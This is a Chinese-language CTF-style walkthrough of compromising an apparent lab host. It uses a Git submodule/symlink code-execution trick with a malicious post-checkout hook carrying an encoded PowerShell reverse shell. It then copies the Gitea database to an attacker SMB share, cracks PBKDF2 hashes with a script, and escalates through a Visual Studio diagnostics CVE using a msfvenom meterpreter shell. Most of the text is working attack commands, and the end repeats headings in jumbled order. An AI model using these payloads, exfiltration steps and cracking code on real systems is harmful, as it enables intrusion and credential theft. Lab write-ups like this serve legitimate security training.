Git-RCE + Visual Studio 2019 权限提升漏洞利用教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 目标扫描<\/h3>

目标IP: 10.10.11.26<\/li>

开放端口:

3000: Gitea服务<\/li>
5000: 代码编译服务(Werkzeug\/3.0.3 Python\/3.12.3)<\/li>

5985: WinRM服务<\/li> <\/ul> <\/li> <\/ul>

1.2 服务识别<\/h3>

Gitea服务: http:\/\/10.10.11.26:3000\/<\/li>
代码编译服务: http:\/\/10.10.11.26:5000\/<\/li>

特定仓库: http:\/\/10.10.11.26:3000\/richard\/Calculator<\/li> <\/ul>

2. Git远程代码执行漏洞利用<\/h2>

2.1 漏洞原理<\/h3>
利用Git的`post-checkout<\/code>钩子和符号链接特性实现远程代码执行。<\/p>`

2.2 利用步骤<\/h3>


准备两个仓库<\/strong><\/p>
git config --global protocol.file.allow always
<\/span><\/span>git config --global core.symlinks true
<\/span><\/span>git config --global init.defaultBranch main
<\/span><\/span>rm -rf nothing
<\/span><\/span>rm -rf toSeeHere
<\/span><\/span><\/code><\/pre><\/li>

创建第一个仓库(repo1)并添加恶意钩子<\/strong><\/p>
git clone http:\/\/10.10.11.26:3000\/test\/repo1.git
<\/span><\/span>cd repo1
<\/span><\/span>mkdir -p y\/hooks
<\/span><\/span><\/code><\/pre><\/li>

创建恶意post-checkout脚本<\/strong><\/p>
cat >y\/hooks\/post-checkout <<EOF
<\/span><\/span><\/span>#!bin\/sh.exe
<\/span><\/span><\/span>powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANwA1ACIALAAxADAAMAAzADIAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
<\/span><\/span><\/span>EOF<\/span>
<\/span><\/span>chmod +x y\/hooks\/post-checkout
<\/span><\/span>git add y\/hooks\/post-checkout
<\/span><\/span>git commit -m "post-checkout"<\/span>
<\/span><\/span>git push
<\/span><\/span><\/code><\/pre><\/li>

创建第二个仓库(repo2)并添加符号链接<\/strong><\/p>
cd ..
<\/span><\/span>git clone http:\/\/10.10.11.26:3000\/test\/repo2.git
<\/span><\/span>cd repo2
<\/span><\/span>git submodule add --name x\/y "http:\/\/10.10.11.26:3000\/test\/repo1.git"<\/span> A\/modules\/x
<\/span><\/span>git commit -m "add-submodule"<\/span>
<\/span><\/span>printf ".git"<\/span> >dotgit.txt
<\/span><\/span>git hash-object -w --stdin <dotgit.txt >dot-git.hash
<\/span><\/span>printf "120000 %s 0\ta\n"<\/span> "<\/span>$(<\/span>cat dot-git.hash)<\/span>"<\/span> >index.info
<\/span><\/span>git update-index --index-info <index.info
<\/span><\/span>git commit -m "add-symlink"<\/span>
<\/span><\/span>git push
<\/span><\/span><\/code><\/pre><\/li>

触发漏洞<\/strong><\/p>
.\/rev.sh http:\/\/10.10.11.26:5000\/
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3. 获取初始访问权限<\/h2>
3.1 获取Gitea数据库<\/h3>


设置SMB共享:<\/p>
impacket-smbserver share \/tmp\/ -smb2support
<\/span><\/span><\/code><\/pre><\/li>

从目标机器复制数据库:<\/p>
cp 'C:\\Program Files\Gitea\data\gitea.db'<\/span> \\10.10.16.75\share
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.2 破解用户密码<\/h3>


使用Python脚本破解PBKDF2哈希:<\/p>
import<\/span> hashlib
<\/span><\/span>import<\/span> binascii
<\/span><\/span>
<\/span><\/span>def<\/span> derive_pbkdf2_key<\/span>(candidate, salt, rounds=<\/span>50000<\/span>, key_length=<\/span>50<\/span>):
<\/span><\/span>    return<\/span> hashlib.<\/span>pbkdf2_hmac(
<\/span><\/span>        'sha256'<\/span>,
<\/span><\/span>        candidate.<\/span>encode('utf-8'<\/span>),
<\/span><\/span>        salt,
<\/span><\/span>        rounds,
<\/span><\/span>        key_length
<\/span><\/span>    )
<\/span><\/span>
<\/span><\/span>def<\/span> attempt_password_crack<\/span>(wordlist_path, target_hash, salt_value, rounds=<\/span>50000<\/span>, key_length=<\/span>50<\/span>):
<\/span><\/span>    target_hash_bytes =<\/span> binascii.<\/span>unhexlify(target_hash)
<\/span><\/span>    try<\/span>:
<\/span><\/span>        with<\/span> open(wordlist_path, 'r'<\/span>, encoding=<\/span>'utf-8'<\/span>) as<\/span> wordlist:
<\/span><\/span>            for<\/span> entry in<\/span> wordlist:
<\/span><\/span>                candidate_password =<\/span> entry.<\/span>strip()
<\/span><\/span>                derived_key =<\/span> derive_pbkdf2_key(candidate_password, salt_value, rounds, key_length)
<\/span><\/span>                if<\/span> derived_key ==<\/span> target_hash_bytes:
<\/span><\/span>                    print(f<\/span>"Password match found: <\/span>{<\/span>candidate_password}<\/span>"<\/span>)
<\/span><\/span>                    return<\/span> candidate_password
<\/span><\/span>    except<\/span> FileNotFoundError<\/span>:
<\/span><\/span>        print("Wordlist file not found. Please check the path."<\/span>)
<\/span><\/span>        return<\/span> None<\/span>
<\/span><\/span>    print("No matching password found."<\/span>)
<\/span><\/span>    return<\/span> None<\/span>
<\/span><\/span>
<\/span><\/span>salt_value =<\/span> binascii.<\/span>unhexlify('227d873cca89103cd83a976bdac52486'<\/span>)
<\/span><\/span>target_hash =<\/span> '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16'<\/span>
<\/span><\/span>wordlist_path =<\/span> '\/usr\/share\/wordlists\/rockyou.txt'<\/span>
<\/span><\/span>attempt_password_crack(wordlist_path, target_hash, salt_value)
<\/span><\/span><\/code><\/pre><\/li>

发现密码: 12345678<\/code><\/p>
<\/li>
<\/ol>
3.3 通过WinRM登录<\/h3>
evil-winrm -i 10.10.11.26 -u 'emily'<\/span> -p '12345678'<\/span>
<\/span><\/span><\/code><\/pre>
获取user flag: 209380d1c60e610f2cef026e0c237404<\/code><\/li>
<\/ol>
4. 权限提升(Visual Studio 2019漏洞)<\/h2>
4.1 漏洞利用准备<\/h3>


生成反向shell:<\/p>
msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=<\/span>10.10.16.75 LPORT=<\/span>4444<\/span> -f exe -o reverse_shell.exe
<\/span><\/span><\/code><\/pre><\/li>

设置监听:<\/p>
msfconsole
<\/span><\/span>use exploit\/multi\/handler
<\/span><\/span>set PAYLOAD windows\/x64\/meterpreter\/reverse_tcp
<\/span><\/span>set LHOST 10.10.16.75
<\/span><\/span>set LPORT 4444<\/span>
<\/span><\/span>run
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4.2 查找VSDiagnostics.exe路径<\/h3>
dir C:\VSDiagnostics.exe \/s \/p
<\/span><\/span><\/code><\/pre>4.3 利用CVE-2024-20656<\/h3>


下载利用工具:<\/p>
cp \\10.10.16.75\share\RunasCs.exe .
<\/span><\/span>cp \\10.10.16.75\share\Expl.exe .
<\/span><\/span>copy \\10.10.16.75\share\reverse_shell.exe .
<\/span><\/span><\/code><\/pre><\/li>

执行提权:<\/p>
.\/RunasCs.exe emily 12345678 .\/Expl.exe
<\/span><\/span><\/code><\/pre><\/li>

获取root flag: 4910be87423e9b471cc4945f1e5fed7f<\/code><\/p>
<\/li>
<\/ol>
5. 关键点总结<\/h2>


Git RCE漏洞利用<\/strong>:<\/p>

利用Git钩子和符号链接特性<\/li>
需要创建两个相互关联的仓库<\/li>
通过代码编译服务触发<\/li>
<\/ul>
<\/li>

密码破解<\/strong>:<\/p>

获取Gitea数据库文件<\/li>
识别PBKDF2哈希算法参数<\/li>
使用rockyou.txt字典破解<\/li>
<\/ul>
<\/li>

权限提升<\/strong>:<\/p>

利用Visual Studio 2019的VSDiagnostics.exe漏洞<\/li>
需要替换MofCompiler.exe文件<\/li>
使用RunasCs工具执行提权操作<\/li>
<\/ul>
<\/li>

工具使用<\/strong>:<\/p>

impacket-smbserver: 文件传输<\/li>
evil-winrm: Windows远程管理<\/li>
msfvenom: 生成payload<\/li>
RunasCs: 以其他用户身份执行命令<\/li>
<\/ul>
<\/li>
<\/ol>

Git-RCE + Visual Studio 2019 权限提升漏洞利用教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. Git远程代码执行漏洞利用<\/h2>

2.1 漏洞原理<\/h3> 利用Git的post-checkout<\/code>钩子和符号链接特性实现远程代码执行。<\/p>

3. 获取初始访问权限<\/h2>

4. 权限提升(Visual Studio 2019漏洞)<\/h2>

2.1 漏洞原理<\/h3>
利用Git的`post-checkout<\/code>钩子和符号链接特性实现远程代码执行。<\/p>`